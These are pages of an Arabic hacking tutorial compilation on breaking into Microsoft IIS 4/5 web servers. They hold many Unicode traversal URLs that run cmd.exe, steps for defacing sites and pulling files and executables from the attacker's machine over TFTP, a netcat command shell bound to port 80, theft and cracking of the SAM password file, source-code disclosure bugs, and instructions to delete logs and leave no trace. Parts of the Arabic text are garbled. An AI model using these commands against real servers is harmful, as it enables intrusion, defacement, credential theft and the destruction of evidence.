<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
hi_HaCkEr & MaXhAk2000<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.<br />
exe?/c+dir+c:\<br />
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c<br />
:\<br />
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />
dir+c:\<br />
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system<br />
32/cmd.exe\?/c+dir+c:\<br />
/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd<br />
.exe?/c+dir+c:\<br />
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3<br />
2/cmd.exe?/c+dir+c:\<br />
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste<br />
m32/cmd.exe?/c+dir+c:\<br />
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3<br />
2/cmd.exe?/c+dir+c:\<br />
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3<br />
2/cmd.exe?/c+dir+c:\
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste<br />
m32/cmd.exe?/c+dir+c:\<br />
٢) بأمكانكال حصول علىبرنامج TFTPD منالموقع http://iisbughelp.4t.<strong>com</strong>/<br />
٣) معرفةالیونیكودبسیطه جدا یكفيانتعر فكی فتستطیعالانتقال عبر الهاردیسكات وعبرالملفات<br />
) تعمل عبرالمتصفح (<br />
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />
dir+C:\<br />
لقرائه مابداخلهاردیسك \ : C<br />
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />
dir+D:\<br />
لقرائه مابداخلهاردیسك \ : D<br />
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />
dir+E:\<br />
لقرائه مابداخلهاردیسك \ : E<br />
نقوم بعمل سكان على الموقعلنرى مابه منثغرات وهنا مثال علىثغرات مبتدأهبالمجلد المطلوب<br />
اغلبثغراتالیونیكودتنطلق من هذهالمجلدات<br />
))<br />
(<strong>١</strong> مثالالمجلد msadc<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />
r+C:\<br />
vti_bin_ (٢<br />
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+<br />
dir+C:\<br />
مثالالمجلد<br />
((<br />
في سیرفرات IIS عندتركیبها ((بشكل عادي )) یكونالمجلدالرئیسيللویبتح تاسممعین وهو<br />
C:\Inetpub\wwwroot<br />
اوفيالمجلد<br />
D:\Inetpub\wwwroot<br />
اوفيالمجلد<br />
E:\Inetpub\wwwroot<br />
في العاده یكونفي الهاردیسك C ولذلك سأكمل شرحي علىانههناك<br />
ستجدفي هذاالمجلد عادة جمیعالمواقع التي علىالسیرفر<br />
:<br />
فلو وجدناثغرة یونیكود ما ولتكن<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
وأردناالولوج الى هذاالمل فلنرى مابهفسنكتبالثغره هكذا :<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />
r+C:\Inetpub\wwwroot<br />
<strong>١</strong>٠٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اذاكانالسیرفر یحوي عدة مواقعفستجدهاكل موقعباسمه ) ستجدهافي مجلداتبداخل مجلدال<br />
) wwwrootامالوكانالسیرفر عباره عن موقع واحدفقطفستجدكافةالملفاتفي مجلدال<br />
wwwroot نفسه<br />
فياغلبالظن یقومالهاكر بتغییرالصفحةالرئیسیهالاولى وعلیكانتعلمانهلیس دائماالصفحةالرئیسیه<br />
الاولىتحملاسم index.htm<br />
هناك عدةتسمیات وأختصاراتلها وهذه بعضها<br />
(( معظمها ))<br />
index.htm<br />
index.asp<br />
default.htm<br />
default.asp<br />
main.htm<br />
main.asp<br />
لنفر ضالاناننا وجدناانالصفحةالرئیسیهللموقعفي مجلدنا wwwroot هي index.htmفكی ف<br />
سنقوم بتغییرها وهو ما یهمناتقریبا من عملیةالاختراق هذه سنقوماولا بتغییراسمالمل ف من<br />
index.htm الىاياسماخر یخطر ببالك ولیكن ss.htm طبعا سنرسلالامر عبرثغرةالیونیكود من<br />
(( علیكانتعر فانالاوامرالتي<br />
المتصفحلدیك وسنقوم بتغییر الداله<br />
سوتضع هي نفسالاوامرالموجودهفي Dos وفي Commandفعلیكانتكون Prompt عارفابما<br />
هوالامر المراداستخدامه<br />
المهم ستكتب الثغره هكذا<br />
c + ren الداله cالى + dir<br />
:<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+re<br />
n+C:\Inetpub\wwwroot\index.htm+ss.htm<br />
(<br />
وهكذافقدتمتغییراسمالصفحة من index.htmالى ss.htm<br />
ارأیتمكمهو سهل :)؟<br />
Aیبدوانكایهاالمخترقلمتكتفيباغلاقالصفحةالرئیسیهللموقعفانتتریدانتضع صفحةبموضو ع<br />
اخر ولیكنالموضو ع هو Hacked!!! فكی ف سنرسلهافي صفحة index.htm ؟؟<br />
هناك عدة طرق ومنها سأذكر هذه الطریقه وهي عبرالاتصالبمنفذ TFTPالذي ستكونفیهانتفي<br />
وضعالسیرفر والموقعالذيامامك في وضعالكلاینت<br />
كی ف سیتم هذا ؟<br />
اولاقم بتركیب نظام سیرفر TFTP على جهازك (البرنامج المذكورفياولالموضو ع من افضلالبرامج<br />
وهناكبرنامجاخراكثراحترافا و لكن هذا یكفي<br />
الان ضعالسیرفرالرئیسيفي \:Cلدیك<br />
قم بتصمیم صفحة خفیفه وسریعه وسمها index.htm وضعهافي<br />
الان نریدان نرسلللسیرفرالمل فالجدید من \:Cلدینا الى مل ف<br />
لالیسالامرصعباففي نظم میكروسوفت یوجدامر ((هوبالأصحبرنامجا منفصلا<br />
وهو عباره عنكلاین تبسیط یستخدم بروتوكول TFTP وهوبروتوكولبسیط جدا جدا ((یسمیهالبع ض<br />
البروتوكولالتافه )) یقومبسحباوارسالالملفات من والىالجهاز ون حن نریدان یسحب ملفا من جهازنا<br />
فكیفلنا ذلك ؟<br />
طبعالوكنافي غیرالیونیكودلكتبناتولیفةالامرالتالي<br />
C:\<br />
C:\inetpub\wwwroot<br />
))یحملاسم TFTP<br />
:<br />
tftp.exe -i XXX.XXX.XXX.XXX get index.htm<br />
C:\inetpub\wwwroot\index.htm<br />
<strong>١</strong>٠٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
(( XXX.XXX.XXX.XXXتعنيايبيالسیرفرالمراد سحبالمل ف منه ))<br />
فيتولیفة هذاالامر یقوم الكلاین تبطلب المل ف المسمى index.htmلیضعهفي جهازهفي المجلد<br />
wwwroot<br />
ولكن لاتنسىفشكلتولیفةالاوامر یختل ف منالوضعالعادي عن وضعالیونیكودفما هو الحل ؟<br />
الحل هوانتحولتولیفةالامرالى یونیكود لتضعهفيالثغرهالتيلدیك<br />
بعدت حویلالامرالى یونیكود سیصبح شكلهكالتالي<br />
:<br />
tftp.exe+"-<br />
i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm<br />
یاللروعهلقدتجاوزناالعقبهبالفعل :)<br />
الانقم بتشغیل سیرفرال TFTP وقم بتجهیز مل ف ال index.htm<br />
وقمبالاتصال مع الموقع عبرثغرةالیونیكود المضا فالیها هذهالتولیفهلیصبحفيالنهایه على هذا النحو<br />
:<br />
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t<br />
ftp.exe+"-<br />
i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm<br />
وهكذاقمنا بتحمیلالصفحةالىالانترنت وانتیهنا من عملیةالاختراق ((تقریبا :) ))<br />
ملحوظه :یمكنكانتقوم بتحمیل ملفات EXEایضاوتشغیلها علىالسیرفربنفسالاسلوب وهذا مثال<br />
لنفر ضاننا نریدتحمیل مل ف EXE علىالسیرفر وسمیناه hunter.exe ونریدتشغیلهفكی فلنا ذلك ؟<br />
سنتبعالاتي<br />
نقوم بتحمیلالمل ف علىالسیرفركماقمنا بتحمیل index.htm ونضعهفي \:Cللسیرفر عبر هذه<br />
التولیفه<br />
:<br />
:<br />
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t<br />
ftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe<br />
:<br />
بعدانیتمتحمیل المل ف سنشغله عبرتنفیذ هذاالامر<br />
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe<br />
او عن طریق هذاالامر<br />
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+<br />
hunter.exe<br />
log.*<br />
:<br />
الآ ن وقدقاربنا علىالانتهاء بقيلدینافيالسیرفر عمل واحدفقطالا وهو مسح ملفاتاللوج<br />
وسیكون ذلك عن طریق هذاالامر<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d<br />
el+C:\*.log/s<br />
هناكانواعاخرى منالملفاتیتمتخزینفیها بع ضالمعلومات ویفضل مسحهاایضا وهي مثلالملفات ذات<br />
الامتداد tmp<br />
:<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d<br />
el+C:\*.tmp/s<br />
وهذاامر مسحها عبرالیونیكود<br />
<strong>١</strong>٠٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ایضا ملحوظه مهمه وهيان لاتبقىايمعلومات عنكفيالسیرفركما یفعل البع ض بذكراسمائهماو<br />
ایمیلاتهمالحقیقیهقمبمسحاي شيء یدل علیكاو على عملیةالاختراق حاولانتصل الى هذا<br />
المستو ى<br />
هناك عدد منالاشیاء والا فكارلن اتطرقالیها مثلارسالفایروس مااوامر على مل ف bat حتى تتمكن<br />
من وضع مشكلهكبیرهفيالسیرفرلكيلایعمل<br />
اوانترسلفایروس یقومبمحو جمیع ملفاتالنظاماوانتمرز نفسكلدیهمفيالسیرفر عن طریقبرامج<br />
التحكم عن بعد واخفائهابشكل جیدفيالمجلدات ذات الملفاتالكثیر مثل<br />
))<br />
)) )) system32 والكثیر<br />
الكثیر<br />
<br />
((<br />
ملحوظات :لنتعمل هذه الثغرهفيكل الحالاتفهناك بع ضالسیرفرات یقومون بقطعالطریق علیك عن<br />
طریق مسح مل ف tftp من سیرفراتهم<br />
) المل فالمسؤول عن ذلك موجودفيالمجلد (system32 وبع ضالسیرفراتقامت بعملیةالترقیع<br />
اصدرت میكروسوفتترقیعالهذهالثغره<br />
وبعضهمقد یكون واضعفایر وول یقومبمراقبةالباكیجالصادر والوارد وقد یقوم بعملاصطیادلمثل هذه<br />
العملیات<br />
واخرون یقومون بتركیببرنامج الحمایهالقوي جدافي نظم IISالا وهو Secure IIS من شركة<br />
))<br />
((<br />
Eeye<br />
والعدیدالعدید من العقبات ولكن عند كتابة هذاالموضو ع ((قبل حوالياربعةاشهر ))كان ما یقارب<br />
منالسیرفراتالتيفیها نظام IIS<br />
تحوي هذهالثغره وبدونترقیع (( لعدم وجوده وقتها ))اولأهمال المدیر.<br />
٩٠<br />
%<br />
<strong>١</strong>٠٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
الدلیل الكامل لإختراق سيرفر<br />
" IIS<br />
$$$$$$$$$$$$<br />
الكاتب DEMON:<br />
$$$$$$$$$$$$<br />
----------<br />
- :<br />
---------<br />
مقدمة<br />
..<br />
.<br />
یعلمالجمیع مد ىانتشار سیرفرات IIS حیثتشكل النسبةالاكبر المستخدمةفيتشغیل مواقعالانترنت<br />
ویعلمالجمیع مد ىضع ف الناحیةالامنیةلهذهالسیرفرات ..لذاقررتالقیامبجمعاشهرثغرات هذاالنو ع<br />
معتوضیحكیفیة عملها<br />
---------<br />
- :<br />
---------<br />
ملاحظة<br />
معظم الطرق الموجودة هناتعمل على سیرفرات IIS4.0 و IIS5.0 وجمیعهاتعتمد علىالبورت<br />
یعني من خلالالمتصفح)) .<br />
((٨٠<br />
-------------<br />
- :<br />
-------------<br />
-<strong>١</strong> CGI-Scanner جید<br />
) www.wiretrip.net/rfp<br />
المتطلبات<br />
..أناافضل) Whiskerیمكنكتنزیله من هذا الموقع<br />
٢- اكتی فبیرل لتشغیل ملفاتالبیرل (یمكنكتنزیله منالموقع:<br />
اي نو ع)<br />
( http://www.activestate.<strong>com</strong>/<br />
:<br />
-٣ ویب سیرفر ) اباتشياو .. IIS<br />
-----------------------<br />
IIS Hack.exe : -<br />
------------------------<br />
اكتش ف خبراءالامنفي شركة eEyeثغرةامنیةتسمحلك بتحمیل نسخه ذكیة من nc.exe وجعلها<br />
تنصت على المنفذ<br />
وهذا سیعطیك<br />
منالموقع<br />
ویجبتشغیل ویب سیرفرفي جهازكقبلتنفیذالثغرة<br />
قمبنسخاداة nc.exeوضعهافيالدلیلالرئیسيللویب سیرفرلدیك<br />
.. ٨٠<br />
سطراوامر cmde.exe معامتیازات . Administrator<br />
بامكانكانزال NC.exe و . http://www.technotronic.<strong>com</strong>/ IIS Hack.exe<br />
..<br />
(فياباتشي Htdocs) وفي IIS<br />
الدلیل . wwwroot<br />
ثمقم بتشغیل : IISHack.exe<br />
80 your_IP/ncx.exe http://www.target.<strong>com</strong>/c:\>iishack.exe<br />
وبعد اتمام الخطوة السابقةبنجاح<br />
:<br />
eGG SheLL وستجدامامك http://www.target.<strong>com</strong>/c:\>nc<br />
<strong>١</strong><strong>١</strong>٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ملاحظة :تعمل هذه الثغرة على سیرفرات IIS4.0فقط<br />
((اذالمیتمتركیبالرقعه)) .<br />
do you want me to explain what to do next, hey <strong>com</strong>mon you must be<br />
kidding<br />
...hehe....<br />
..<br />
%٤٠<br />
)<br />
-----------------------<br />
MDAC = RDS :-<br />
-----------------------<br />
اعتقدانهاثغرةقدیمةقلیلا لكني ما زلتارىان من المواقعتعاني منها<br />
تسمحلك هذهالثغرة بتشغیلاوامرك علىالنظامالهد فبشكلم حلي سیتمتشغیل وامركبصفتك مستخدم<br />
SYSTEMايبصلاحیات مدیر النظام .. على العموماذااردتمعرفةاذا ماكان النظام مصابابهذه<br />
الثغرةام لا<br />
..<br />
..<br />
قماولابالاتصالبالنظامالهد ف 80ثمقمبارسال http://www.host.<strong>com</strong>/ : c:\>nc -nw -w 2<br />
الامر : GET /msadc/msadcs.dll HTTP<br />
.. ((<br />
(( www.wiretrip.net/rfp :<br />
mdac.pl - msadc2.pl )) v<br />
c:\> mdac.pl -h host.<strong>com</strong><br />
Please type the NT <strong>com</strong>mandline you want to run (cmd /c assumed):\n<br />
cmd /c<br />
فإ ذاكانالرد application/x_varg :فهذایعنيان النظام مصاب ((اذالمیتمترقیعه<br />
بامكانكایجاد سكربتا تبیرلتسهل علیك العملفي هذا الموقع<br />
إ ذااردتتغییرالصفحهالرئیسیة ما علیكالاتنفیذ<br />
الامر > hehe : echo hacked by me<br />
C:\inetpub\wwwroot\index.htm<br />
وإ ذاأردنااحكام السیطرة على الموقعبامكانناتحمیل Hacker'sاقصد Swiss knife Army<br />
بواسطة هذاالامر<br />
:<br />
Nc.exe<br />
%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r<br />
nc.exe&&nc.exe -l -p 80 -t -e cmd.exe<br />
)<br />
قم بقراءةالامر منالیسار الىالیمین لت مكن منقراءته جیدا)<br />
بعدهاقمبالاتصالبالنظامالهد ف على المنفذ ٨٠ وستجد سطراوامر معامتیازات . Administrator<br />
-------------------------------------------------<br />
Codebrws.asp & Showcode.asp :-<br />
--------------------------------------------------<br />
..<br />
الملفان عبارة عنقاريء ملفات ASP یأتي مع IIS ولكنه لا یأتي محملافتراضیابل یجب على مدیر<br />
النظامتفعیله<br />
فإ ذاكانت هذهالخدمة مفعلة ستسفید منهاكثیراقهيتسمحلك بقراءةاي مل ف)) .asp اعني رؤیة<br />
المصدر)) .<br />
: ((<br />
http://www.victim.<strong>com</strong>/msadc/samples...nt/repair/sam._<br />
باستخدام هذاالامر ست حصل على مل فالسام ((اذاكان النظام مصابا<br />
بعد ال حصول على مل فالسام .. it Expandباستخدامالاداة it & Crack المفضلةلدي) LC3.0<br />
سیتمكسرهافياقل من<br />
٢٤ ساعه ( .<br />
<strong>١</strong><strong>١</strong><strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
----------------<br />
Null.htw : -<br />
----------------<br />
عملیة شر حكیفیة عمل هذه الثغرةمعقدقلیلا ..لذا سأكتفيفقطبطریقةالاستفادة منها<br />
باختصارتسمحلكبرؤیةالسورسكود لاي مل ف .. ASP<br />
لتنفیذ الثغرة:<br />
سیعر ضلك هذا الراب طالسورسكودالخا صبالصفحه . Default.asp<br />
..<br />
http://www.victim.<strong>com</strong>/null.htw?CiWe...HiliteType=full<br />
------------------------------<br />
webhits.dll & .htw : -<br />
------------------------------<br />
http://www.victim.<strong>com</strong>/blabla.htw :<br />
فإ ذاكانالردبهذه العبارة format of the QUERY_STRING is invalid :فهذایعنيان<br />
. %٩٠<br />
:<br />
www.victim.<strong>com</strong>/xxxxxxxxx/xxxxxxxx/x...hilitetype=full<br />
اولاقم بتجربة اللنك على النظامالهد ف<br />
النظام الهد ف مصاببنسبة<br />
اخیرا جربتنفیذالثغرةبهذهالطریقة<br />
معتغییرال XXXXX/XXXXX/XXXX/XXX.htwباحد هذهالملحقات ، وبالتأكید سیعملاحدها<br />
iissamples/issamples/oop/qfullhit.htw<br />
iissamples/issamples/oop/qsumrhit.htw<br />
isssamples/exair/search/qfullhit.htw<br />
isssamples/exair/search/qsumrhit.htw<br />
وبالتالي ست حصل على مل فالسامقم بكسرهبواسطهالاداة .. LC3<br />
:<br />
-------------------------------------------------------<br />
[$DATA] ASP Alternate Data Streams:-<br />
-------------------------------------------------------<br />
هذه الثغرةكانتبدایتها منذالعام .. <strong>١</strong>٩٩٨ وهي مخصصةبالتحدیدلسیرفرا ت IIS3.0 والانتعمل على<br />
بع ض سیرفرات .. IIS4.0<br />
ومهمتها عر ض السورسكود لاي صفحه (( البع ضیتساءل مالفائدة من عر ض سورسالصفحه ؟؟<br />
الاجابةان بع ضالصفحاتتحتوي على معلومات مهمة مثلكلمات مرورقواعدالبیانات مثل<br />
((<br />
Global.asa<br />
یمكنتنفیذالثغرة منالمتصفحبواسطة هذا الأمر<br />
http://www.victim.<strong>com</strong>/default.asp::<br />
$DATA<br />
<strong>١</strong><strong>١</strong>٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
-----------------------<br />
ASP dot bug : -<br />
-----------------------<br />
ربمااقدمثغرةفي هذاالن ص هي هذهالثغرة حی ثتقومایضا بعر ض السورسكودالخا ص بأي صفحه<br />
..<br />
:<br />
حیثتم اكتشافهافيالعام .. <strong>١</strong>٩٩٧<br />
ویتمتنفیذها منالمتصفحبهذا الشكل<br />
.http://www.victim.<strong>com</strong>/sample.aspلاحظ النقطة الموجودةفياخر السطر<br />
وهيفق طتعمل على سیرفرات . IIS3.0<br />
..<br />
-------------------------------------------<br />
ISM.DLL Buffer Truncation : -<br />
-------------------------------------------<br />
..<br />
خطأبرمجي یسمحللمهاجمبسحب الملفات ورؤویةالسورسكودایضا<br />
وفكرة الثغرة هيالتحایل علىالسیرفربإیهامهانناقمنا یطلب مل ف ما .. وفيالحقیقة ن حن نقومبطلب<br />
ملفاخر<br />
المل ف المسؤوول عن هذا الخطأ هو ISM.dll حی ثیتمتحمیله بعددكبیر منالرموز المسافة (% ٢٠ )<br />
Space .<br />
:<br />
(...
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
----------------<br />
site.csc : -<br />
----------------<br />
تمكنك هذه الثغرة منمعرفةمعلومات مهمة عن ال DNS الخا صبالموقعبمافي ذلك DSN, UID<br />
…<br />
and PASS Database ..<br />
الثغرة : http://www.victim.<strong>com</strong>/adsamples/config/site.csc<br />
سیقوم المهاجمبانزالالمل فالمذكور ..وسی حصل علىمعلوما تقیمة وهامةأیضا<br />
<strong>١</strong><strong>١</strong>٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
::<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$$$$<br />
الكاتب BURN_EG: ACID<br />
$$$$$$$$$$$$$$$$$$$<br />
"دراسة مفصلة وبعمق في الUniCode"<br />
السلام علیكم ورحمهاالله وبركاته<br />
ازیكم شبابایهاخباركمكلكم؟ اتمنىتكونوابخیرو.<br />
اعذرونى على غیبتى وانقطاعى عنكم ولكن واالله ظ رو ف رهیبه<br />
و الان خلونا نر غىفى شویهكلامفاضى على رأىبروكن<br />
كنت اتصفحالانترنت وادعبث شو ىو بعدین جمعت بع ض من المعلومات من ملفات مختلفه و هى تتحد ث<br />
عنالیونىكود ) طبعا الانمعظمكم سیستعجل و یقول یاههههه یونىكودقدیمه الخ<br />
اصبرلقد ذكرتالیونىكودفى المنتدیاتثلا ث مرات مره عنالصدیقبلاكهنتر و مره من الا خ هكس و<br />
مره عنالصدیق دیموناوابو خلودلكن هذه المره صدقونى ستكون مختلفهتمامالاختلا ف عن المرات<br />
( ولكنانااقوله<br />
....<br />
السابقه( (Trust Me<br />
والان دعونا منهاالخرابیط و<br />
خلونا نقولالدرس یمكنیعجبكم::<br />
<br />
متى وجدتالیونىكود؟<br />
Found On 15 May 2001 BY NSFOCUS<br />
السیستیمزالتى تتأثربالثغره هى::<br />
All running IIS 4 / IIS 5 web server<br />
Windows 2k<br />
Windows 2k SP1 + SP2<br />
ثغرهالیونىكود ::هى عباره عنثغرهتسمحللهاكر بأن یشغلاوامربالقوهبصلاحیه مسموحبها<br />
یكونلهام<br />
(اى<br />
تیاز( IUSR_machinename account<br />
وتحد ث هذهالثغرهاصلانتیجهان روتینال cgi الموجود على الویب سرفر نفسه یفك شفره عنوان<br />
الموقع مرتین و هذا ما نسمیهبال )DeCode لاتقلق ستفهم بعد ذلك<br />
(<br />
تعالىمعى<br />
خلینىاوض حلكایهالخرابی ط الىاناكاتبهافوقد ى<br />
ولیكن مثلا ::<br />
http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
سرفر وبالتحدید هذاالفولدریسمى الفولدر التنفیذىاى( executable directory<br />
و طبعا هذاالفولدرلیسلهاسمثابت هذافق ط مثال ولكن یمكنان یكونلهاسماءكثیره علىالملقم iis و<br />
ملحوظههامه::لا یوجد علىكل ملقم iis هذاالفولدرالتنفیذىاى executable directory<br />
واعتقدانالصدیقبلاك هنتر والا خ هك سقد ذكرومعظماسامى هذه الدیریكتورزفى شرحهم<br />
انارب طالدروس مع بع ض حتىتكون سلسله متكامله<br />
) فأناارید<br />
(<br />
؟ *<br />
hi_HaCkEr & MaXhAk2000<br />
(<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
هو مكتوبامامى ولكنتقدرتقولانهاالاوامر التىتأخذ فتره طویله حبتین مثل ping مثلا<br />
و مثلاهناك argumentأخر مثل Q/ و هذا نستخدمهفىاغلاقتفعیلامر echoكما هو واضحفى<br />
المثالفوق<br />
و هناكالكثیر من هذهال arguments و طبعا منها ما هواساسى لا یمكنكالتحكمفیه (یعنى فتحهاو<br />
غلقه مثلال c/وال ) k/ و هناكاخرین یمكنكانتجعلهم on او off وبهذاتكونانت تتحكمبحالهال<br />
خاصتك (یاری تتنفذالامر وتقرأالمكتوب لانك راحتلاقىتفاصیل الفتح والغلقبالتفصیل<br />
اصبروا علىقلیلا حتىانتهى منالامتحانالاولفى MCSEفى خلالاسبوعینان شاءااللهتعالى و بعد<br />
ذلكنعود اكثرقوه و نشرحلكم هذه النقطهبالتفصیلان شاءااللهبساصبرو شو ى<br />
اعتقدانكالانفهمت ما هىال arguments و مافائده c/ التىتكتبهافىالثغره وانا متأكدانك لا<br />
تعر فمعناها .<br />
تعالو نروحلنقطه سهله وبسیطه جداا فىالثغره ،ان تتشغلال cmd.exeلانكتریدان تتحكمبالموقع<br />
وتغیرالاندكس والخ و ولكنتعالى مثلا نشغلاى مل فتانى یاترىكی ف نشغله ؟<br />
انا راحاقلككی ف ::كل ما علیك فعله هوانتقومبوضعاسم الفایلالذىتریدتشغیلهبهذا الشكل<br />
بلا من cmd.exe?/c وبهذاتكونقد شغلتالفایل الذىتریده<br />
حیثتصبحالثغرهبهذاالشكل<br />
( و<br />
cmd<br />
Ping.exe+PRINT<br />
::<br />
( enjoy this ) .<br />
http://issserver/scripts/..%5c..%.../ping.exe+PRINT<br />
- +c/ *وبالتالىكما عرفنافوقانا c/هىال argumentلل cmd.exeاوالحالهالتى سینفذ علیها<br />
الامراما علامهال +التىبجانبال c/فهىبمقامالمسافهبین الكلمتینفىالثغره ولكن لا<br />
یمكننااسبدالهابمسافه عادیهو بعدها یكونالامر الذ ىیحمله سطرالاوامرلینفدهثم علامه +ثانیه و<br />
بعدهااسم الدرای فالذ ىتعر ض محتویاته علىالشاشه حالیا<br />
.<br />
::<br />
ال cmd<br />
**و نأتىالان لاهم نقطهفىالثغره و هىاساسا سبب الثغرهكما ذكرنافىاولالكلام (هوان سببالثغره<br />
یكون حل شفرهالعنواناكثر من مره )و هذا ما نطلق علیهال decodeوانا شخصیاافصلالدیكودز على<br />
انهت حلیل حتى نصل لابس ط الحلكمافىالریاضیاتیعنى simplyfiey ا ىتبسیط وفك المعادلهتعالو<br />
خلینا نفهمكم هذا على الثغره نفسها<br />
255c..%255c%../هذاهو الدیكودا ىالت حلیلللاصل /....<br />
ولكن ماالذى نحاولان نفعلهبهذهالت حلیلات الغریبه ؟<br />
